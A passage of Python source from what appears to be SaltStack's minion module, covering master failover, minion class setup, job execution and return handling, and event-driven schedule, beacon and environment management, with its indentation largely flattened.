shuffle(opts['master'])
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], str) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
# we're probably called from the minion's main event loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
log.info('Removing possibly failed master {0} from list of'
' masters'.format(opts['master']))
# create new list of master with the possibly failed one removed
opts['master'] = [x for x in opts['master_list'] if opts['master'] != x]
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# If failover is set, the minion has to fail over on DNS errors instead of retrying DNS resolution.
# See issue 21082 for details
if opts['retry_dns']:
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
local_masters = copy.copy(opts['master'])
for master in local_masters:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
self.opts = opts
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = local_masters
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError:
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
self.connected = False
msg = ('No master could be reached or all masters denied '
'the minion\'s connection attempt.')
log.error(msg)
else:
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
self.eval_master(self.opts, failed=True)
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils,
include_errors=True)
self.proxy = salt.loader.proxy(self.opts, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.returners = salt.loader.returners(self.opts, self.functions)
self.states = salt.loader.states(self.opts, self.functions, self.utils)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
# timeout for one of the minions to auth with a master
MINION_CONNECT_TIMEOUT = 5
def __init__(self, opts):
super(MultiMinion, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
if not isinstance(self.opts['master'], list):
log.error(
'Attempting to start a multimaster system with one master')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
for master in set(self.opts['master']):
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
s_opts['auth_timeout'] = self.MINION_CONNECT_TIMEOUT
self.io_loop.spawn_callback(self._connect_minion, s_opts)
@tornado.gen.coroutine
def _connect_minion(self, opts):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
try:
minion = Minion(opts,
self.MINION_CONNECT_TIMEOUT,
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(opts['master']),
)
yield minion.connect_master()
minion.tune_in(start=False)
break
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
# Fire off all the minion coroutines
self.minions = self._spawn_minions()
# serve forever!
self.io_loop.start()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.io_loop = io_loop or zmq.eventloop.ioloop.ZMQIOLoop()
if not self.io_loop.initialized():
self.io_loop.install()
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')]
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup of the opts grains, so we can log from the grains
# module
if 'proxyid' not in self.opts:
self.opts['grains'] = salt.loader.grains(opts)
# TODO: remove?
def sync_connect_master(self):
'''
Block until we are connected to a master
'''
log.debug("sync_connect_master")
self._connect_master_future = self.connect_master()
# finish connecting to master
self._connect_master_future.add_done_callback(lambda f: self.io_loop.stop())
self.io_loop.start()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
future_exception = self._connect_master_future.exc_info()
if future_exception:
raise six.reraise(*future_exception)
@tornado.gen.coroutine
def connect_master(self):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minion's scheduler
if 'mine.update' in self.functions:
log.info('Added mine.update to scheduler')
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2
}
}, persist=True)
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
self.grains_cache = self.opts['grains']
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _process_beacons(self):
'''
Process each beacon and send events if appropriate
'''
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception as exc:
log.critical('Beacon processing failed: {0}. No beacons will be processed.'.format(traceback.format_exc()))
beacons = None
if beacons:
self._fire_master(events=beacons)
for beacon in beacons:
serialized_data = salt.utils.dicttrim.trim_dict(
self.serial.dumps(beacon['data']),
self.opts.get('max_event_size', 1048576),
is_msgpacked=True,
)
log.debug('Sending event - data = {0}'.format(beacon['data']))
event = '{0}{1}{2}'.format(
beacon['tag'],
salt.utils.event.TAGEND,
serialized_data,
)
self.event_publisher.handle_publish([event])
def _load_modules(self, force_refresh=False, notify=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts)
return functions, returners, errors, executors
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
channel = salt.transport.Channel.factory(self.opts)
try:
result = channel.send(load, timeout=timeout)
return True
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
target = Minion._thread_multi_return
else:
target = Minion._thread_return
# We stash an instance reference to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
if self.opts['multiprocessing']:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
process = multiprocessing.Process(
target=target, args=(instance, self.opts, data)
)
else:
process = threading.Thread(
target=target,
args=(instance, self.opts, data),
name=data['jid']
)
process.start()
if not sys.platform.startswith('win'):
process.join()
else:
self.win_proc.append(process)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules()
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing']:
salt.utils.daemonize_if(opts)
salt.utils.appendproctitle(data['jid'])
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
executors = data.get('module_executors') or opts.get('module_executors', ['direct_call.get'])
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', ''):
executors[-1] = 'sudo.get'
# Get the last one, which is the function executor
executor = minion_instance.executors[
"{0}".format(executors.pop())](opts, data, func, args, kwargs)
# Instantiate others from bottom to the top
for executor_name in reversed(executors):
executor = minion_instance.executors["{0}".format(executor_name)](opts, data, executor)
return_data = executor.execute()
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in \'{0}\' had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing \'{0}\': {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(function_name, exc, func.__doc__, )
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle(data['jid'])
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
channel = salt.transport.Channel.factory(self.opts)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
salt.utils.fopen(fn_, 'w+b').write(self.serial.dumps(ret))
try:
ret_val = channel.send(load, timeout=timeout)
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warning(msg)
return ''
log.trace('ret_val = {0}'.format(ret_val))
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, package):
'''
Manage the minion's scheduler: add, modify, delete, enable, disable, or run jobs based on the event data.
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist, where)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist, where)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
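    # Illustrative note (not part of the original source): manage_schedule is fed
    # unpacked minion events whose data dict selects one of the branches above.
    # A hypothetical 'add' request could carry a payload such as:
    #   {'func': 'add',
    #    'name': 'job1',
    #    'schedule': {'job1': {'function': 'test.ping', 'seconds': 60}},
    #    'persist': True}
    # Only the keys read above (func, name, schedule, where, persist) are
    # consumed here; the job definition itself is whatever salt.utils.schedule
    # accepts.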
def manage_beacons(self, package):
'''
Manage Beacons
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons()
def environ_setenv(self, package):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
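    # Illustrative note (not part of the original source): the event data handled
    # above could, for example, look like
    #   {'environ': {'HTTP_PROXY': 'http://proxy:3128'},
    #    'false_unsets': False,
    #    'clear_all': False}
    # and is passed straight through to salt.modules.environ.setenv. The values
    # shown are hypothetical.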
def clean_die(self, signum, frame):
'''
        Python does not handle SIGTERM cleanly, so if it is signaled, exit
        the minion process cleanly
'''
self._running = False
exit(0)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, package):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
load = salt.utils.event.SaltEvent.unpack(package)[1]
load['tok'] = self.tok
try:
ret = channel.send(load)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
log.debug('Handling event \'{0}\''.format(package))
if package.startswith('module_refresh'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
self.module_refresh(notify=data.get('notify', False))
elif package.startswith('pillar_refresh'):
yield self.pillar_refresh()
elif package.startswith('manage_schedule'):
self.manage_schedule(package)
elif package.startswith('manage_beacons'):
self.manage_beacons(package)
elif package.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif package.startswith('environ_setenv'):
self.environ_setenv(package)
elif package.startswith('_minion_mine'):
self._mine_send(package)
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif package.startswith('__master_disconnected'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
# if the master disconnect event is for a different master, raise an exception
if data['master'] != self.opts['master']:
raise Exception()
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
self.opts['master'] = self.eval_master(opts=self.opts,
failed=True)
if self.connected:
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
del self.pub_channel
self._connect_master_future = self.connect_master()
self.block_until_connected() # TODO: remove
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('__master_connected'):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
